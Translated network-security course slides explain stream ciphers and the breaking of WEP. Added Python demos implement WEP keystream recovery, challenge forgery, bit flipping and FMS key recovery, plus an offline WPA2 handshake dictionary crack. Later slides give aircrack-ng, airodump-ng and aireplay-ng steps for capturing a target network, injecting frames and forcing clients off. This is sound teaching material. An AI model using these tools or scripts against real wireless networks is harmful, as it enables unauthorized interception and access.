One-Time Pad
• Remember the One-Time Pad?
  [diagram: M → E(M, K) → CT → D(CT, K) → M, with the same key K on both sides]
  • E(M, K) = M ⊕ K = CT
  • D(CT, K) = CT ⊕ K = ?
  • D(CT, K) = D(M ⊕ K, K) = M ⊕ K ⊕ K = M
Sicurezza delle Reti - Esercitazione (Network Security - exercise session)
One-Time Pad: Bad News
• Fast encryption/decryption (XOR)
• Perfect secrecy ⇒ |K| ≥ |M|
  • K and M have the same length
  • Hard to use in practice!
• Idea:
  • Split M into N chunks of length |K| ⇒ {M₀, M₁, …, Mₙ}
  • CT₀ = M₀ ⊕ K, CT₁ = M₁ ⊕ K, …
  • But…
• CT₀ ⊕ CT₁ = ?? ⇒ CT₀ ⊕ CT₁ = (M₀ ⊕ K) ⊕ (M₁ ⊕ K) = M₀ ⊕ M₁
  • The key cancels out: the attacker gets the XOR of two plaintexts without ever learning K
• Use a random key K only once!
Idea: Stream Cipher
• Replace the "random key" with a pseudo-random key
  • Use a Pseudo-Random Generator (PRG)
  • It takes a short, truly random key (the seed)
  • It expands the key into a "random-looking" sequence (the keystream)
• PRG: {0,1}^s → {0,1}^n, with n ≫ s
• K: 128 bits ⇒ PRG(K): 10^6 bits
  [diagram: M → E(M, PRG(K)) → CT → D(CT, PRG(K)) → M; the 128-bit key K is expanded to a 2048-bit keystream on both sides]
One-time key-stream?
• Same issue as the One-Time Pad
  • CT₀ ⊕ CT₁ = (M₀ ⊕ K) ⊕ (M₁ ⊕ K) = M₀ ⊕ M₁
  • If one message is known ⇒ the other is known
  • Limited entropy
  • Context information
• Use the pseudo-random stream PRG(K) only once!
• Refresh the seed value with a "nonce": Kᵢ = PRG(nonce || K)
• Secure if:
  • The "nonce" is unique
  • The PRG is unpredictable:
    PRG(X)|₀,…,ᵢ ⇏ PRG(X)|ᵢ₊₁,…,ₙ
    (the first i output bits must not help in predicting the following ones)
WEP: Wired Equivalent Privacy
• Special-purpose protocol for IEEE 802.11 (802.11b) wireless LANs
• Intended to make wireless as secure as wired…
• Intended to provide:
  • Authentication
  • Integrity
  • Confidentiality
• What is wrong in a protocol that uses:
  • RC4 as the PRG function
  • A 40-bit key as seed
  • A 24-bit nonce (IV) for freshness
WEP: Protocol
1. <IV || K> is used as the RC4 seed… and MUST never repeat (why?)
   • K is a shared key ⇒ security depends on the IV cycle
2. The CRC-32 checksum is linear under XOR (then?)
3. The IV generation algorithm is implementation dependent (then?)
[diagram: WEP frame processing, with points 1–3 marked]
WEP: Changing IV
• A stream cipher must be synchronized on both sides
  • Not suitable for lossy channels
• WEP solution:
  • Refresh the IV for each frame
  • Frames can be decrypted even if the previous packet was lost
• Send the IV in cleartext
  • Not an issue if it never repeats:
    keystream = PRG(IV || K) ⇒ K remains unknown
WEP: Changing IV
• The WEP standard does not specify the IV generation algorithm
  • Left to the implementation!
  • NEVER do this with security-relevant choices
• We can choose:
  • Incremental generation ⇒ rᵢ = rᵢ₋₁ + 1
    • Only a 24-bit IV ⇒ ONLY 2²⁴ ≈ 17M frames per cycle
    • Assuming 1500-byte frames at 7 Mbps (≈1.7 ms per frame)
    • IV re-cycle after… less than 8 h!
  • Random generation
    • Birthday paradox
    • P(IVₙ = IVₙ₋ₜ for some earlier frame) > 50% after… 2¹² ≈ 4000 frames
  • On some 802.11 cards
    • IV reset after a power cycle
WEP: Attacks
• Passive attack
  • Build a dictionary: {IV, RC4(IV || K)}
  • Use known messages to recover the keystream:
    [M ⊕ RC4(IV || K)] ⊕ M = RC4(IV || K)
  • Known messages?
    • Send an e-mail with a large known attachment
    • Authentication can help you!
  • Wait for the IV to repeat:
    [M′ ⊕ RC4(IV || K)] ⊕ RC4(IV || K) = M′
• Idea:
  • We can use a longer key K (e.g. > 40 bit)
  • The IV is still 24 bits ⇒ same attack time!!
WEP: Authentication
• Authentication based on a challenge handshake
  • The user must prove knowledge of K
  • Encrypt the challenge using the symmetric cipher
  AP → Client: Challenge
  Client → AP: ENC_K(Challenge)
WEP: Authentication
• Authentication based on a challenge handshake
  • The user must prove knowledge of K
  • Encrypt the challenge using the symmetric cipher
  • Same keystream RC4(IV || K) as for frame encryption
  AP → Client: Challenge
  Client → AP: IV, Challenge ⊕ RC4(IV || K)
WEP: Authentication
• Rogue Access Point
  • Sends multiple challenges to the user
  • Retrieves multiple (IVₙ, RC4(IVₙ || K)) pairs, since both Cₙ and Cₙ ⊕ RC4(IVₙ || K) are visible
  • Reuses the recovered pairs against the real authenticator
  Rogue AP → Client: Challenge Cₙ
  Client → Rogue AP: IVₙ, Cₙ ⊕ RC4(IVₙ || K)
WEP: Authentication
• No need to know the key
  • The AP sends challenge C
  • The attacker chooses an IVₓ from the dictionary
  • It can compute C ⊕ RC4(IVₓ || K)
  • Authentication successful!
  AP → Attacker: Challenge C
  Attacker → AP: IVₓ, C ⊕ RC4(IVₓ || K)
WEP: Authentication
• If no active attack is possible
• If no IV is available
  • Just eavesdrop ONE legitimate authentication
  • The attacker recovers a valid (IV, RC4(IV || K)) pair: the challenge C is sent in clear, so C ⊕ [C ⊕ RC4(IV || K)] = RC4(IV || K)
  AP → Client: Challenge C
  Client → AP: IV, C ⊕ RC4(IV || K)
Example: Bit Flipping
• The sender transmits "Bob" ⊕ PRG(K); the attacker XORs ΔM into the ciphertext; the receiver computes "Eve" ⊕ PRG(K) ⊕ PRG(K) = "Eve"
  M  = "Bob" = 42 6F 62
  ΔM = M ⊕ M′ = 07 19 07
  M′ = "Eve" = 45 76 65
• CT ⊕ ΔM = (M ⊕ PRG(K)) ⊕ ΔM = M′ ⊕ PRG(K): the keystream is never needed
WEP: Integrity
• Useless encryption; what about integrity?
• CRC-32 of the message as Integrity Check Value (ICV)
• CRC-32 is NOT a hash function!
• Linear function:
  CRC32(X ⊕ Y) = CRC32(X) ⊕ CRC32(Y)
  (the CRC-32 variant used by 802.11 has a non-zero initial value and a final inversion, so for equal-length inputs the exact relation is CRC32(X ⊕ Y) = CRC32(X) ⊕ CRC32(Y) ⊕ CRC32(0…0); the constant term is public and changes nothing for the attacker)
• USE cryptographic algorithms (MACs) to verify integrity!
• A plain checksum gives no message authentication!
• Consequences:
  • Message modification (bit flipping)!
  • Message injection!
WEP: Message modification
• Simple operations turn M into M′
• No need to know the keystream
• Flipped-bits computation: CT′ = CT ⊕ (ΔM || CRC(ΔM))
  (with the real 802.11 CRC-32 the ICV delta is CRC(ΔM) ⊕ CRC(0…0), a constant the attacker can compute)
• CT′ is an encrypted message with a valid ICV!
  CT  = (M  || CRC(M )) ⊕ RC4(IV || K)
  CT′ = (M′ || CRC(M′)) ⊕ RC4(IV || K), where M′ = M ⊕ ΔM and CRC(M′) = CRC(M) ⊕ CRC(ΔM) by linearity
WEP: Message injection
• The attacker knows how to recover a pair (IV, RC4(IV || K))
• The attacker can inject a message M′
  • "Authenticate" M′ by computing CRC32(M′)
  • Encrypt the message and send the frame
  Attacker → AP: IV, (M′ || CRC(M′)) ⊕ RC4(IV || K)
  • The AP decrypts, checks the CRC and accepts: WEP has no replay or freshness check on the receiving side, so the same IV can be reused indefinitely
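The attacks of the last slides (keystream recovery from a known plaintext, decryption of a second frame that reuses the IV, answering a shared-key authentication challenge without K, and bit flipping with a valid ICV), as an added worked example in Python. This is not code from the slides or from aircrack-ng: RC4 and the WEP framing are implemented inline, and the key, IV, messages and challenge are constructed values chosen for the demo.

```python
import zlib
from typing import Optional, Tuple


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key scheduling (KSA) followed by `length` PRGA output bytes."""
    S = list(range(256))
    j = 0
    for i in range(256):                                   # KSA
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):                                # PRGA
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(msg: bytes) -> bytes:
    """WEP integrity check value: CRC-32 (zlib uses the same polynomial,
    initial value 0xFFFFFFFF and final inversion as IEEE 802.11)."""
    return zlib.crc32(msg).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, msg: bytes) -> Tuple[bytes, bytes]:
    """Frame body = (M || CRC(M)) XOR RC4(IV || K); the IV travels in the clear."""
    body = msg + icv(msg)
    return iv, xor(body, rc4_keystream(iv + key, len(body)))


def wep_decrypt(key: bytes, iv: bytes, ct: bytes) -> Optional[bytes]:
    """Receiver side: strip the keystream and accept only if the ICV matches."""
    body = xor(ct, rc4_keystream(iv + key, len(ct)))
    msg, tag = body[:-4], body[-4:]
    return msg if icv(msg) == tag else None


# ---- attacker side: none of these functions ever sees KEY ----------------
def recover_keystream(ct: bytes, known_msg: bytes) -> bytes:
    """[M || CRC(M)] XOR keystream, XOR [M || CRC(M)] = keystream for this IV."""
    return xor(ct, known_msg + icv(known_msg))


def answer_challenge(iv: bytes, ks: bytes, challenge: bytes) -> Tuple[bytes, bytes]:
    """Shared-key authentication without K: reply with a recovered (IV, keystream)
    pair. The real challenge is 128 bytes, so 132+ keystream bytes are needed."""
    return iv, xor(challenge + icv(challenge), ks)


def flip(ct: bytes, delta: bytes) -> bytes:
    """CT' = CT XOR (dM || dICV). For the real CRC-32, CRC(M XOR dM) =
    CRC(M) XOR CRC(dM) XOR CRC(0...0), so the constant term is part of dICV."""
    d_icv = xor(icv(delta), icv(bytes(len(delta))))
    return xor(ct, delta + d_icv)


KEY = bytes.fromhex("0102030405")          # constructed 40-bit shared key
IV = bytes.fromhex("0c0d0e")               # constructed 24-bit IV, reused below
MSG1 = b"Bob: transfer 100 EUR"            # known to the attacker (e.g. sent by her)
MSG2 = b"Eve: top secret memo"             # unknown, but encrypted under the same IV
CHALLENGE = b"constructed-chal"            # 16-byte stand-in for the AP challenge


def demo() -> dict:
    iv, ct1 = wep_encrypt(KEY, IV, MSG1)
    _, ct2 = wep_encrypt(KEY, IV, MSG2)
    ks = recover_keystream(ct1, MSG1)                      # dictionary entry for IV
    delta = xor(b"Bob", b"Eve") + bytes(len(MSG1) - 3)     # 07 19 07 00 ... 00
    auth_iv, auth_resp = answer_challenge(iv, ks, CHALLENGE)
    return {
        "reused_iv_plaintext": xor(ct2, ks)[:-4],          # MSG2 without K
        "auth_accepted": wep_decrypt(KEY, auth_iv, auth_resp) == CHALLENGE,
        "forged_accepted": wep_decrypt(KEY, iv, flip(ct1, delta)),
        "naive_forgery": wep_decrypt(KEY, iv, xor(ct1, delta + icv(delta))),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

`naive_forgery` applies the textbook formula CT ⊕ (ΔM || CRC(ΔM)) literally; the receiver rejects it because the 802.11 CRC-32 is affine rather than strictly linear, while `flip`, which folds in the CRC of the all-zero message, produces a frame the receiver accepts.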
What WEP teaches
• Using a good cipher is not enough:
  • YOU MUST design good protocols
  • YOU MUST make good use of the ciphers
• The best protocol with the best cipher could still be the worst solution!
• YOU MUST avoid confusion
  e.g. integrity is not authentication
Could it get even worse?
• Is it possible to recover the key K? Yes!
• Cryptanalytic attacks on RC4:
  1. Fluhrer, Mantin and Shamir (showed the weakness)
     • There are "weak" IVs for which the first keystream byte is correlated with the key: for such an IV, with ≈5% probability the first keystream byte reveals the next secret key byte (the other guesses are spread uniformly, so majority voting over many weak IVs recovers it)
     • 4–6 million packets ⇒ 50% probability of recovering K
  2. Stubblefield, Ioannidis, Rubin (used the weakness)
     • Focus on the first byte of the keystream
     • 802.11 uses SNAP/LLC encapsulation ⇒ the first plaintext byte is known (0xAA), so the first keystream byte is ciphertext[0] ⊕ 0xAA
     • Attack time linear in the key size
  3. Others…
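The FMS attack described above, as an added worked example in Python (not code from the slides or from aircrack-ng). The victim side is simulated with a constructed 40-bit key, frames are assumed to start with the SNAP byte 0xAA, and the attacker uses only the weak IV class (A+3, 255, X) that the original paper identifies; the vote formula is the standard one, K[A] = S⁻¹[out] − j − S[A+3], evaluated on the KSA state after the known key prefix.

```python
from collections import Counter
from typing import Callable, List, Optional, Tuple

SNAP = 0xAA                          # first LLC/SNAP byte of every 802.11 data frame
KEY = bytes.fromhex("1f2e3d4c5b")    # constructed 40-bit secret; the attacker never reads it


def ksa(key: bytes, steps: int = 256) -> Tuple[List[int], int]:
    """RC4 key scheduling, optionally stopped after `steps` iterations.
    Returns the permutation S and the running index j at that point."""
    S = list(range(256))
    j = 0
    for i in range(steps):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j


def first_keystream_byte(key: bytes) -> int:
    """First PRGA output: i = 1, j = S[1], swap, emit S[S[1] + S[j]]."""
    S, _ = ksa(key)
    j = S[1]
    S[1], S[j] = S[j], S[1]
    return S[(S[1] + S[j]) & 0xFF]


def victim_first_ct_byte(iv: bytes) -> int:
    """What the sniffer sees: the first ciphertext byte of a frame starting with SNAP."""
    return SNAP ^ first_keystream_byte(iv + KEY)


def fms_vote(iv: bytes, known: bytes, out: int) -> Optional[int]:
    """One vote for secret key byte number len(known), given the first keystream
    byte `out` seen under `iv`. Returns None unless the IV is 'resolved': after
    the KSA steps that use only IV || known, the first PRGA output would be read
    from position a = len(known) + 3, the position the unknown byte acts on next."""
    a = len(known) + 3
    S, j = ksa(iv + known, a)
    if not (S[1] < a and ((S[1] + S[S[1]]) & 0xFF) == a):
        return None
    # Step a sets S[a] = S[j'] with j' = j + S[a] + K[a]. With probability ~5%
    # positions 1, S[1] and a survive the remaining KSA steps, so out == S[j'];
    # inverting S then gives j' and hence K[a]. Otherwise the vote is noise.
    s_inv = [0] * 256
    for idx, val in enumerate(S):
        s_inv[val] = idx
    return (s_inv[out] - j - S[a]) & 0xFF


def recover_key(key_len: int, capture: Callable[[bytes], int]) -> bytes:
    """Attack byte by byte with the weak IV class (a+3, 255, X), X = 0..255,
    keeping the most voted candidate; earlier bytes feed the next round."""
    known = b""
    for a in range(key_len):
        votes: Counter = Counter()
        for x in range(256):
            iv = bytes([a + 3, 255, x])
            vote = fms_vote(iv, known, capture(iv) ^ SNAP)
            if vote is not None:
                votes[vote] += 1
        known += bytes([votes.most_common(1)[0][0]])
    return known


if __name__ == "__main__":
    guess = recover_key(len(KEY), victim_first_ct_byte)
    print("recovered:", guess.hex(), "| correct:", guess == KEY)
```

With 256 weak IVs per key byte the correct value collects roughly 13 votes against about one per wrong candidate, which is enough for most keys; a real attack gathers several IV classes and far more frames, which is why the packet counts in the slides are in the millions (or tens of thousands for PTW).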
802.11 aftermath
• Optimized WEP attacks ⇒ WEP DEATH!
• WPA: a temporary solution (2003)
  • Based on the Temporal Key Integrity Protocol (TKIP)
  • Maintains hardware compatibility (still RC4)
  • Longer IVs (48 bit)
  • IV protection ⇒ per-packet key mixing: the IV fed to RC4 differs from the IV sent in the clear
  • Ephemeral derivation of the key K ⇒ time-changing (temporal) keys
• WPA2: the definitive solution (2004)
  • Similar to WPA but:
  • Based on the newer AES cipher (CCMP) ⇒ needs new hardware
  • Enterprise mode: authentication against a server (802.1X/EAP)
http://aircrack-ng.org/
Aircrack-ng
• Open-source suite providing:
  • Packet sniffer: airodump-ng
  • Password cracker: aircrack-ng
  • Packet injection tool: aireplay-ng
  • Others…
• Many key recovery attacks:
  • Pyshkin, Tews and Weinmann (PTW)
    • Only 35–40k packets for a 128-bit (104-bit secret) key
  • Fluhrer, Mantin and Shamir (FMS) and related statistical attacks
  • Dictionary/brute-force attack (also on the WPA/WPA2 4-way handshake)
Aircrack-ng: Setup
• Need to switch the wireless card to monitor mode
  • Different from promiscuous mode: no need to be associated with an AP
  • Only supported wireless cards
    • Atheros, Linksys, …
  • Need to install the proper drivers
  • May need to patch the firmware
Now you can sniff all packets on the wireless channel!
Aircrack-ng: airmon
• airmon-ng start <wireless_id> (e.g. wlan0)
• service network-manager stop (kill the NetworkManager service, which would otherwise keep reconfiguring the interface)
• Check the wireless interfaces: iwconfig
  • wlan0: physical interface
  • mon0: virtual monitor-mode interface
Aircrack-ng: airodump
• Let's see the list of available networks: airodump-ng mon0
  [screenshot: airodump-ng output, networks (BSSIDs) on top, associated clients below]
• airodump-ng is the sniffing tool
  • Can be used to see the list of available networks
  • Can be used to sniff and save the trace of a network
1. Choose the target WEP network: 76:6A:89:54:4A:A4
   • At least one client connected
   • More sniffed traffic: less cracking time
2. Filter the network's flow: --bssid <network_bssid>
3. Save the packet trace: -w <file.pcap>
• Start sniffing the target:
  airodump-ng -w wep --bssid 76:6A:89:54:4A:A4 mon0
  [screenshot: airodump-ng capture; the #Data column is the counter that has to grow]
• Wait until #Data reaches a reasonable value
  • Small passphrase ≈ 10k
  • Long passphrase ≈ 40k
Aircrack-ng: aircrack
• The traffic trace is stored in the .pcap file wep-01.pcap
• Start the aircrack tool to retrieve the key:
  aircrack-ng wep-01.pcap
Aircrack-ng: need traffic
• If there is not enough traffic in the network
  • Inject packets into the network with aireplay-ng:
    1. Replay of sniffed ARP packets (every reply from the AP carries a fresh IV)
    2. Force disassociation of clients
       • Sniff the reassociation packets
• To perform packet injection
  • You need to present yourself to the AP as an authenticated client (fake authentication, possibly with a spoofed MAC address)
  aireplay-ng + macchanger
What about WPA?
• No efficient method to crack WPA/WPA2-PSK
• Only a brute-force/dictionary attack on the passphrase, checked offline against the captured handshake
  1. Sniff the 4-way handshake (its MIC is computed with a key derived from the passphrase)
  2. Start the brute-force attack on the WPA key
• Complexity depends on the password complexity
• Think of the default passwords of some vendors:
  S = f(MAC), very weak
• Useless WPA protection…
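The offline handshake attack of the slide above, as an added worked example in Python (not code from the slides or from aircrack-ng). The key derivation is the standard WPA2-PSK one (PBKDF2-HMAC-SHA1 over the SSID, the PRF-512 pairwise key expansion, and the HMAC-SHA1-128 MIC over the EAPOL-Key frame); the SSID, MAC addresses, nonces, EAPOL frame bytes, true passphrase and wordlist are all constructed for the demo.

```python
import hashlib
import hmac
from typing import Iterable, Optional

SSID = b"HomeNet-7A3F"                        # constructed
AP_MAC = bytes.fromhex("001122334455")        # constructed authenticator address
STA_MAC = bytes.fromhex("66778899aabb")       # constructed supplicant address
ANONCE = bytes(range(32))                     # constructed nonces (real ones are random)
SNONCE = bytes(range(32, 64))
TRUE_PASSPHRASE = "sunflower2009"             # constructed, deliberately guessable

# Constructed stand-in for EAPOL-Key message 2 with its 16-byte MIC field zeroed.
# A real attack hashes the captured frame exactly as it was sent.
EAPOL_MSG2_NO_MIC = (bytes.fromhex("0103005f02010a00") + bytes(8) + SNONCE
                     + bytes(16) + bytes(8) + bytes(8) + bytes(16) + bytes(2))


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """IEEE 802.11i PSK: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def ptk_from_pmk(pmk: bytes) -> bytes:
    """PRF-512(PMK, "Pairwise key expansion", min/max MACs || min/max nonces)."""
    data = (min(AP_MAC, STA_MAC) + max(AP_MAC, STA_MAC)
            + min(ANONCE, SNONCE) + max(ANONCE, SNONCE))
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return ptk[:64]


def eapol_mic(ptk: bytes, frame_no_mic: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK = PTK[0:16], frame)[:16]."""
    return hmac.new(ptk[:16], frame_no_mic, hashlib.sha1).digest()[:16]


# What the sniffer captures: message 2 carries a MIC under the real PTK.
CAPTURED_MIC = eapol_mic(ptk_from_pmk(pmk_from_passphrase(TRUE_PASSPHRASE, SSID)),
                         EAPOL_MSG2_NO_MIC)


def crack(wordlist: Iterable[str], captured_mic: bytes = CAPTURED_MIC) -> Optional[str]:
    """Offline dictionary attack: one PBKDF2 (4096 SHA-1 rounds) and five HMACs per
    guess; nothing here talks to the network, so the AP cannot rate-limit it."""
    for candidate in wordlist:
        ptk = ptk_from_pmk(pmk_from_passphrase(candidate, SSID))
        if hmac.compare_digest(eapol_mic(ptk, EAPOL_MSG2_NO_MIC), captured_mic):
            return candidate
    return None


WORDLIST = ["password", "admin1234", "HomeNet", "sunflower", "sunflower2009", "qwerty"]

if __name__ == "__main__":
    print("recovered passphrase:", crack(WORDLIST))
```

The cost per guess is fixed by the protocol (4096 SHA-1 iterations plus a few HMACs), so the only defence is passphrase entropy; a default passphrase derived from the MAC address or SSID turns the wordlist into a short, targeted one.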